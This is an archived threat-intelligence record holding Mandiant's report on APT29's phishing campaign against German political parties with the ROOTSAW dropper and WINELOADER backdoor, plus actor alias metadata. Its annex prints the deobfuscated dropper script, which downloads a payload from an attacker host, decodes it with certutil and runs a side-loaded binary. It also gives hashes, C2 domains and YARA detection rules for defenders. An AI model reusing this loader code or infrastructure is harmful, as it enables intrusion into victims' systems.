{
	"id": "5c3e35fc-e6bf-40e1-9066-0a51d6654207",
	"created_at": "2026-04-06T00:21:22.278843Z",
	"updated_at": "2026-04-10T03:37:16.790912Z",
	"deleted_at": null,
	"sha1_hash": "2f73b0453f4e3e91ca9ff2e442c35985c76c50f5",
	"title": "APT29 Uses WINELOADER to Target German Political Parties",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 411858,
	"plain_text": "APT29 Uses WINELOADER to Target German Political Parties\r\nBy Mandiant\r\nPublished: 2024-03-22 · Archived: 2026-04-05 20:47:44 UTC\r\nWritten by: Luke Jenkins, Dan Black\r\nExecutive Summary\r\nIn late February, APT29 used a new backdoor variant publicly tracked as WINELOADER to target German political parties with a CDU-themed lure.\r\nThis is the first time we have seen this APT29 cluster target political parties, indicating a possible area of emerging operational focus beyond the typical targeting of diplomatic missions.\r\nBased on the SVR’s responsibility to collect political intelligence and this APT29 cluster’s historical targeting patterns, we judge this activity to present a broad threat to European and other Western political parties from across the political spectrum.\r\nPlease see the Technical Annex for technical details and MITRE ATT\u0026CK techniques (T1543.003, T1012, T1082, T1134, T1057, T1007, T1027, T1070.004, T1055.003 and T1083).\r\nThreat Detail\r\nIn late February 2024, Mandiant identified APT29 — a Russian Federation-backed threat group linked by multiple governments to Russia’s Foreign Intelligence Service (SVR) — conducting a phishing campaign targeting German political parties. Consistent with APT29 operations extending back to 2021, this operation leveraged APT29’s mainstay first-stage payload ROOTSAW (aka EnvyScout) to deliver a new backdoor variant publicly tracked as WINELOADER.\r\nNotably, this activity represents a departure from this APT29 initial access cluster’s typical remit of targeting governments, foreign embassies, and other diplomatic missions, and is the first time Mandiant has seen an operational interest in political parties from this APT29 subcluster. 
Additionally, while APT29 has previously used lure documents bearing the logo of German government organizations, this is the first instance where we have seen the group use German-language lure content — a possible artifact of the targeting differences (i.e. domestic vs. foreign) between the two operations.\r\nPhishing emails were sent to victims purporting to be an invite to a dinner reception on 01 March bearing a logo from the Christian Democratic Union (CDU), a major political party in Germany (see Figure 1).\r\nThe German-language lure document contains a phishing link directing victims to a malicious ZIP file containing a ROOTSAW dropper hosted on an actor-controlled compromised website, “https://waterforvoiceless[.]org/invite.php”.\r\nROOTSAW delivered a second-stage CDU-themed lure document and a next-stage WINELOADER payload retrieved from “waterforvoiceless[.]org/util.php”.\r\nhttps://www.mandiant.com/resources/blog/apt29-wineloader-german-political-parties\r\nPage 1 of 8\n\nWINELOADER was first observed in operational use in late January 2024 in an operation targeting likely diplomatic entities in Czechia, Germany, India, Italy, Latvia, and Peru.\r\nThe backdoor contains several features and functions that overlap with several known APT29 malware families including BURNTBATTER, MUSKYBEAT and BEATDROP, indicating they are likely created by a common developer (see Technical Annex for additional details).\r\nFigure 1: Lure document redirecting victims to an APT29-controlled compromised WordPress website hosting ROOTSAW\r\nFigure 2: Second CDU lure displayed by ROOTSAW downloader\r\nOutlook \u0026 Implications\r\nROOTSAW continues to be the central component of APT29’s initial access efforts to collect foreign political intelligence. 
The first-stage malware’s expanded use to target German political parties is a noted departure from the typical diplomatic focus of this APT29 subcluster, and almost certainly reflects the SVR’s interest in gleaning information from political parties and other aspects of civil society that could advance Moscow’s geopolitical interests.\r\nAs highlighted in our previous research detailing APT29’s operations in the first half of 2023, these malware delivery operations are highly adaptive, and continue to evolve in lockstep with Russia’s geopolitical realities. We therefore suspect that APT29’s interest in these organizations is unlikely to be limited to Germany. Western political parties and their associated bodies from across the political spectrum are likely also possible targets for future SVR-linked cyber espionage activity given Moscow’s vital interest in understanding changing Western political dynamics related to Ukraine and other flashpoint foreign policy issues.\r\nBased on recent activity from other APT29 subclusters, attempts to achieve initial access beyond phishing may include attempts to subvert cloud-based authentication mechanisms or brute-force methods such as password spraying. For more details regarding APT29’s recent tactics, please see the February 2024 advisory from the United Kingdom’s National Cyber Security Centre (NCSC).\r\nTechnical Annex\r\nInitial Access\r\nStarting as early as 26 February 2024, APT29 distributed phishing attachments containing links to an actor-controlled compromised website, “waterforvoiceless[.]org/invite.php”, to redirect victims to a ROOTSAW dropper.\r\nThis ROOTSAW variant uses the same JavaScript obfuscation resource used in previous APT29 operations, and ultimately results in a request to download and execute the second-stage WINELOADER from the same server at “waterforvoiceless[.]org/util.php”. 
\r\nThe ROOTSAW payload contains a JSObfuscated payload that, when parsed, results in the following code. The code is responsible for downloading a file to disk as “invite.txt”, decoding it using Windows Certutil, then decompressing it using tar. Finally, the legitimate Windows binary (SqlDumper.exe) is executed by the actor.\r\nvar a = new ActiveXObject(\"Wscript.Shell\");\r\nfunction Ijdaskjw(_0x559297) {\r\n  var _0x3bd487 = new XMLHttpRequest();\r\n  _0x3bd487.onreadystatechange = function () {\r\n    if (_0x3bd487.readyState == 0x4 \u0026\u0026 _0x3bd487.status == 0xc8) {\r\n      var _0x11aa10 = _0x3bd487.response;\r\n      var _0xce698d = new ActiveXObject(\"Scripting.FileSystemObject\");\r\n      var _0x20081c = _0xce698d.OpenTextFile(\"C:\\\\Windows\\\\Tasks\\\\invite.txt\", 0x2, true, 0x0);\r\n      _0x20081c.Write(_0x11aa10);\r\n      _0x20081c.close();\r\n      a.Run(\"certutil -decode C:\\\\Windows\\\\Tasks\\\\invite.txt C:\\\\Windows\\\\Tasks\\\\invite.zip\", 0x0);\r\n      var _0x245d53 = Date.now();\r\n      var _0x3f9f72 = null;\r\n      do {\r\n        _0x3f9f72 = Date.now();\r\n      } while (_0x3f9f72 - _0x245d53 \u003c 0xbb8);\r\n      a.Run(\"tar -xf C:\\\\Windows\\\\Tasks\\\\invite.zip -C C:\\\\Windows\\\\Tasks\\\\ \", 0x0);\r\n      var _0x245d53 = Date.now();\r\n      var _0x3f9f72 = null;\r\n      do {\r\n        _0x3f9f72 = Date.now();\r\n      } while (_0x3f9f72 - _0x245d53 \u003c 0xdac);\r\n      a.Run(\"C:\\\\Windows\\\\Tasks\\\\SqlDumper.exe\", 0x0);\r\n    }\r\n  };\r\n  _0x3bd487.open(\"GET\", _0x559297, true);\r\n  _0x3bd487.send(null);\r\n}\r\nIjdaskjw(\"https://waterforvoiceless.org/util.php\");\r\nInvite.pdf (MD5: fb6323c19d3399ba94ecd391f7e35a9c)\r\nSecond CDU-themed PDF lure document\r\nWritten in LibreOffice 6.4 by default user “Writer”\r\nMetadata documents the PDF as en-GB language\r\nLinks to https://waterforvoiceless[.]org/invite.php\r\ninvite.php (MD5: 7a465344a58a6c67d5a733a815ef4cb7)\r\nZip file 
containing ROOTSAW\r\nDownloaded from https://waterforvoiceless[.]org/invite.php\r\nExecutes efafcd00b9157b4146506bd381326f39\r\ninvite.hta (MD5: efafcd00b9157b4146506bd381326f39)\r\nROOTSAW downloader containing obfuscated code\r\nDownloads from https://waterforvoiceless[.]org/util.php\r\nExtracts 44ce4b785d1795b71cee9f77db6ffe1b\r\nExecutes f32c04ad97fa25752f9488781853f0ea\r\ninvite.txt (MD5: 44ce4b785d1795b71cee9f77db6ffe1b)\r\nMalicious certificate file, extracted using Windows Certutil\r\nExecuted from efafcd00b9157b4146506bd381326f39\r\nDownloaded from https://waterforvoiceless[.]org/util.php\r\ninvite.zip (MD5: 5928907c41368d6e87dc3e4e4be30e42)\r\nMalicious zip containing WINELOADER\r\nExtracted from 44ce4b785d1795b71cee9f77db6ffe1b\r\nContains e017bfc36e387e8c3e7a338782805dde\r\nContains f32c04ad97fa25752f9488781853f0ea\r\nsqldumper.exe (MD5: f32c04ad97fa25752f9488781853f0ea)\r\nLegitimate Microsoft file Sqldumper used for side loading\r\nAnalysis of WINELOADER\r\nWINELOADER is likely a variant of the non-public historic BURNTBATTER and MUSKYBEAT code families which Mandiant uniquely associates with APT29. It shares a similar design and pattern, specifically around the invocation of the malware and the anti-analysis techniques used. However, the code family itself is considerably more customized than the previous variants, as it no longer uses publicly available loaders like DONUT or DAVESHELL and implements a unique C2 mechanism. 
Additionally, WINELOADER contains the following shared techniques with other code families used by APT29:\r\n- The RC4 algorithm used to decrypt the next-stage payload;\r\n- Process/DLL name check to validate the payload context (in use since early BEATDROP variants);\r\n- Ntdll usermode hook bypass (in use since early BEATDROP variants).\r\nWINELOADER is invoked via a DLL side-loading technique into a legitimate Windows executable and starts to decrypt the main implant logic itself using RC4. This first layer of deobfuscation was first witnessed in the MUSKYBEAT/BURNTBATTER malware families and was originally used to decrypt a second file also stored in the zip file. Within WINELOADER, it is used to decrypt a region of memory containing the actual WINELOADER module. This module is compiled position-independent shellcode which contains references within itself to strings and decryption modules.\r\nThe decryption function then moves execution to this position-independent shellcode. ZScaler refers to this resource as the WINELOADER core module, and notes that it contains settings (C2 information, RC4 decryption keys) and strings. Based on samples identified by Mandiant, the WINELOADER resource contains 70 encrypted strings, and both samples have the default sleep timer of 2 seconds configured.\r\nWINELOADER communicates using HTTP GET requests with a user agent contained within the resource. Each packet to the C2 server contains a random-size registration packet; this packet contains environment information like the victim’s username/device name, the process name and some information that could be used by the actor to determine whether the compromised system is a valid target (parent process path, etc.). 
The response from the C2 server can task WINELOADER to execute a new module (either within the same process, or via process injection) and to update the sleep timer.\r\nAlthough Mandiant was unable to obtain commands from the actor, ZScaler reported that they were able to receive a command to persist WINELOADER, which resulted in a run key being configured on the device.\r\nvcruntime140.dll (MD5: 8bd528d2b828c9289d9063eba2dc6aa0)\r\nWINELOADER downloader\r\nCommunicates to https://siestakeying[.]com/auth.php\r\nVcruntime140.dll (MD5: e017bfc36e387e8c3e7a338782805dde)\r\nWINELOADER downloader\r\nCommunicates to https://siestakeying[.]com/auth.php\r\nMITRE ATT\u0026CK Techniques\r\nID Technique\r\nT1543.003 Windows Service\r\nT1012 Query Registry\r\nT1082 System Information Discovery\r\nT1134 Access Token Manipulation\r\nT1057 Process Discovery\r\nT1007 System Service Discovery\r\nT1027 Obfuscated Files or Information\r\nT1070.004 File Deletion\r\nT1055.003 Thread Execution Hijacking\r\nT1083 File and Directory Discovery\r\nDetections\r\nrule M_APT_Dropper_Rootsaw_Obfuscated\r\n{\r\n    meta:\r\n        author = \"Mandiant\"\r\n        disclaimer = \"This rule is meant for hunting and is not tested to run in a production environment.\"\r\n        description = \"Detects obfuscated ROOTSAW payloads\"\r\n    strings:\r\n        $ = \"function _\"\r\n        $ = \"new XMLHttpRequest();\"\r\n        $ = \"'\\\\x2e\\\\x7a\\\\x69\\\\x70'\"\r\n        $ = \"'\\\\x4f\\\\x70\\\\x65\\\\x6e'\"\r\n        $ = \"\\\\x43\\\\x3a\\\\x5c\\\\x57\"\r\n    condition:\r\n        all of them\r\n}\r\nrule M_APT_Downloader_WINELOADER_1\r\n{\r\n    meta:\r\n        author = \"Mandiant\"\r\n        disclaimer = \"This rule is meant for hunting and is not tested to run in a production environment.\"\r\n        description = \"Detects rc4 decryption logic in WINELOADER samples\"\r\n    strings:\r\n        $ = {B9 00 01 00 00 99 F7 F9 8B 44 24 [50-200]\r\n0F B6 00 3D FF 00 00 
00} // Key initialization\r\n        $ = {0F B6 00 3D FF 00 00 00} // Key size\r\n    condition:\r\n        all of them\r\n}\r\nrule M_APT_Downloader_WINELOADER_2\r\n{\r\n    meta:\r\n        author = \"Mandiant\"\r\n        disclaimer = \"This rule is meant for hunting and is not tested to run in a production environment.\"\r\n        description = \"Detects payload invocation stub in WINELOADER\"\r\n    strings:\r\n        // 48 8D 0D ?? ?? 00 00 lea rcx, module_start (Pointer to encrypted resource)\r\n        // 48 C7 C2 ?? ?? 00 00 mov rdx, ???? (size of encrypted source)\r\n        // E8 [4] call decryption\r\n        // 48 8D 05 [4] lea rcx, ??\r\n        // 48 8D 0D [4] lea rax, module_start (decrypted resource)\r\n        // 48 89 05 [4] mov ptr_mod, rax\r\n        //\r\n        $ = {48 8D 0D ?? ?? 00 00 48 C7 C2 ?? ?? 00 00 E8 [4] 48 8D 0D [4] 48 8D 05 [4] 48 89 05 }\r\n    condition:\r\n        all of them\r\n}\r\nSource: https://www.mandiant.com/resources/blog/apt29-wineloader-german-political-parties",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://www.mandiant.com/resources/blog/apt29-wineloader-german-political-parties"
	],
	"report_names": [
		"apt29-wineloader-german-political-parties"
	],
	"threat_actors": [
		{
			"id": "5b748f86-ac32-4715-be9f-6cf25ae48a4e",
			"created_at": "2024-06-04T02:03:07.956135Z",
			"updated_at": "2026-04-10T02:00:03.689959Z",
			"deleted_at": null,
			"main_name": "IRON HEMLOCK",
			"aliases": [
				"APT29 ",
				"ATK7 ",
				"Blue Kitsune ",
				"Cozy Bear ",
				"The Dukes",
				"UNC2452 ",
				"YTTRIUM "
			],
			"source_name": "Secureworks:IRON HEMLOCK",
			"tools": [
				"CosmicDuke",
				"CozyCar",
				"CozyDuke",
				"DiefenDuke",
				"FatDuke",
				"HAMMERTOSS",
				"LiteDuke",
				"MiniDuke",
				"OnionDuke",
				"PolyglotDuke",
				"RegDuke",
				"RegDuke Loader",
				"SeaDuke",
				"Sliver"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a241a1ca-2bc9-450b-a07b-aae747ee2710",
			"created_at": "2024-06-19T02:03:08.150052Z",
			"updated_at": "2026-04-10T02:00:03.737173Z",
			"deleted_at": null,
			"main_name": "IRON RITUAL",
			"aliases": [
				"APT29",
				"Blue Dev 5 ",
				"BlueBravo ",
				"Cloaked Ursa ",
				"CozyLarch ",
				"Dark Halo ",
				"Midnight Blizzard ",
				"NOBELIUM ",
				"StellarParticle ",
				"UNC2452 "
			],
			"source_name": "Secureworks:IRON RITUAL",
			"tools": [
				"Brute Ratel C4",
				"Cobalt Strike",
				"EnvyScout",
				"GoldFinder",
				"GoldMax",
				"NativeZone",
				"RAINDROP",
				"SUNBURST",
				"Sibot",
				"TEARDROP",
				"VaporRage"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "46b3c0fc-fa0c-4d63-a38a-b33a524561fb",
			"created_at": "2023-01-06T13:46:38.393409Z",
			"updated_at": "2026-04-10T02:00:02.955738Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"Cloaked Ursa",
				"TA421",
				"Blue Kitsune",
				"BlueBravo",
				"IRON HEMLOCK",
				"G0016",
				"Nobelium",
				"Group 100",
				"YTTRIUM",
				"Grizzly Steppe",
				"ATK7",
				"ITG11",
				"COZY BEAR",
				"The Dukes",
				"Minidionis",
				"UAC-0029",
				"SeaDuke"
			],
			"source_name": "MISPGALAXY:APT29",
			"tools": [
				"SNOWYAMBER",
				"HALFRIG",
				"QUARTERRIG"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a",
			"created_at": "2022-10-25T15:50:23.548494Z",
			"updated_at": "2026-04-10T02:00:05.292748Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"APT29",
				"IRON RITUAL",
				"IRON HEMLOCK",
				"NobleBaron",
				"Dark Halo",
				"NOBELIUM",
				"UNC2452",
				"YTTRIUM",
				"The Dukes",
				"Cozy Bear",
				"CozyDuke",
				"SolarStorm",
				"Blue Kitsune",
				"UNC3524",
				"Midnight Blizzard"
			],
			"source_name": "MITRE:APT29",
			"tools": [
				"PinchDuke",
				"ROADTools",
				"WellMail",
				"CozyCar",
				"Mimikatz",
				"Tasklist",
				"OnionDuke",
				"FatDuke",
				"POSHSPY",
				"EnvyScout",
				"SoreFang",
				"GeminiDuke",
				"reGeorg",
				"GoldMax",
				"FoggyWeb",
				"SDelete",
				"PolyglotDuke",
				"AADInternals",
				"MiniDuke",
				"SeaDuke",
				"Sibot",
				"RegDuke",
				"CloudDuke",
				"GoldFinder",
				"AdFind",
				"PsExec",
				"NativeZone",
				"Systeminfo",
				"ipconfig",
				"Impacket",
				"Cobalt Strike",
				"PowerDuke",
				"QUIETEXIT",
				"HAMMERTOSS",
				"BoomBox",
				"CosmicDuke",
				"WellMess",
				"VaporRage",
				"LiteDuke"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434882,
	"ts_updated_at": 1775792236,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2f73b0453f4e3e91ca9ff2e442c35985c76c50f5.pdf",
		"text": "https://archive.orkl.eu/2f73b0453f4e3e91ca9ff2e442c35985c76c50f5.txt",
		"img": "https://archive.orkl.eu/2f73b0453f4e3e91ca9ff2e442c35985c76c50f5.jpg"
	}
}